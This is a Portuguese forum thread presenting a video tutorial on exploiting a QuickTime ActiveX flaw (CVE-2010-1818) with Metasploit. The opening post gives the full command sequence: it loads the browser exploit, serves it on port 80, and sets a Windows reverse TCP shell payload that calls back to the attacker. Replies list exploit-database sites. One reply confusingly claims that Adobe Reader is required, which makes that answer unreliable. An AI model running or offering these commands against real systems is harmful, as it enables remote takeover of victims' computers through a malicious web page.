Results 1 to 5 of 5

Thread: Metasploit - Vulnerabilidade no QuickTime 7.6.7 (0day)

  1. #1
    Senior Member Bhior's Avatar
    Join Date
    Apr 2010
    Posts
    152

    Exclamation [Video aula] Vulnerabilidade no QuickTime 7.6.7 (0day)

    Nessa aula mostro como explorar a vulnerabilidade no QuickTime, essa vulnerabilidade e classificada de 0day e afeta todas as versões do QuickTime e do Windows. Ela foi descoberta pelo Investigador de segurança Ruben Santamarta.

    Comandos:

    use exploit/windows/browser/apple_quicktime_marshaled_punk
    set SRVHOST SeuIP
    set SRVPORT 80
    set URIPATH /
    set payload windows/shell/reverse_tcp
    set LHOST SeuIP
    set LPORT 5050
    exploit
    Sobre o Vídeo:
    Formato: AVI
    Tamanho: 8.2 MB
    Duração: 3:57 min
    Musica: Mantenha o Respeito - Marcelo D2

    Baixar:
    On-line:
    Ref:
    CVE - CVE-2010-1818 (under review)
    67705: Apple Quicktime QTPlugin.ocx ActiveX IPersistPropertyBag2::Read Function _Marshaled_pUnk Memory Corruption
    Reverse Mode - [0day] Apple QuickTime "_Marshaled_pUnk" backdoor param client-side arbitrary code execution

    Fonte: Blog do Bhior: Metasploit - Vulnerabilidade no QuickTime 7.6.7 (0day)
    Last edited by Bhior; 09-17-2010 at 04:05 PM. Reason: Prefixo

  2. #2
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: Metasploit - Vulnerabilidade no QuickTime 7.6.7 (0day)

    Wow, não estava a par dessa... Vou já actualizar a minha cópia! Obrigado por partilhar, Bhior.

    Já agora, onde posso ficar a par dos mais recentes exploits? Tem algum site específico?

    EDIT: Após ver o vídeo fiquei com uma dúvida. Para este exploit funcionar, temos que ter o quicktime aberto, certo?

    Abr
    Last edited by Snayler; 09-17-2010 at 03:17 AM.

  3. #3
    Good friend of the forums espreto's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    303

    Default Re: Metasploit - Vulnerabilidade no QuickTime 7.6.7 (0day)

    Já agora, onde posso ficar a par dos mais recentes exploits? Tem algum site específico?
    Sério Snayler? Dúvido que você não saiba! Hehehe! Alias, meus parabéns por ser um dos membros mais ativos do fórum!

    Mais vou responder alguns pra quem realmente não saiba!

    OSVDB: The Open Source Vulnerability Database
    SecurityFocus
    .:[ packet storm ]:. - http://packetstormsecurity.org/
    Exploits Database by Offensive Security

    Dentre outros!!

    Att,
    (gdb) disass m(y_br)ain

    ®

  4. #4
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: Metasploit - Vulnerabilidade no QuickTime 7.6.7 (0day)

    Quote Originally Posted by espreto View Post
    Sério Snayler? Dúvido que você não saiba! Hehehe! Alias, meus parabéns por ser um dos membros mais ativos do fórum!
    Lol! Por acaso não sabia, porque ainda não estou muito dentro do assunto no que toca a exploits. Mas uma simples procura no google dava-me uma resposta, é verdade. Apenas perguntei porque queria saber qual seria a melhor fonte

  5. #5
    Senior Member Bhior's Avatar
    Join Date
    Apr 2010
    Posts
    152

    Default Re: Metasploit - Vulnerabilidade no QuickTime 7.6.7 (0day)

    Quote Originally Posted by Snayler View Post
    Lol! Por acaso não sabia, porque ainda não estou muito dentro do assunto no que toca a exploits. Mas uma simples procura no google dava-me uma resposta, é verdade. Apenas perguntei porque queria saber qual seria a melhor fonte
    Ola meu caro,

    Você pode usar esse aqui também, ele reunir a maioria dos sites relacionados ao assunto.
    Sim, precisa ter o Adobe reader instalado.

    Abraços

Similar Threads

  1. [Video] Vulnerabilidade no Adober Reader - CVE-2010-0188
    By Bhior in forum Tutoriais e Howtos
    Replies: 4
    Last Post: 07-03-2010, 05:52 PM
  2. Wow! My DNS is POOR! Vulnerabilidade do DNS (CVE-2008-1447)
    By firebits in forum Tutoriais e Howtos
    Replies: 0
    Last Post: 04-09-2010, 08:13 PM
  3. 0day
    By firebits in forum Iniciantes
    Replies: 1
    Last Post: 03-29-2010, 02:57 AM
  4. HP NNM 0day
    By purehate in forum OLD Official BT videos
    Replies: 0
    Last Post: 09-30-2009, 04:08 AM
  5. Quicktime exploit
    By SBerry in forum OLD General IT Discussion
    Replies: 7
    Last Post: 09-22-2008, 06:59 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •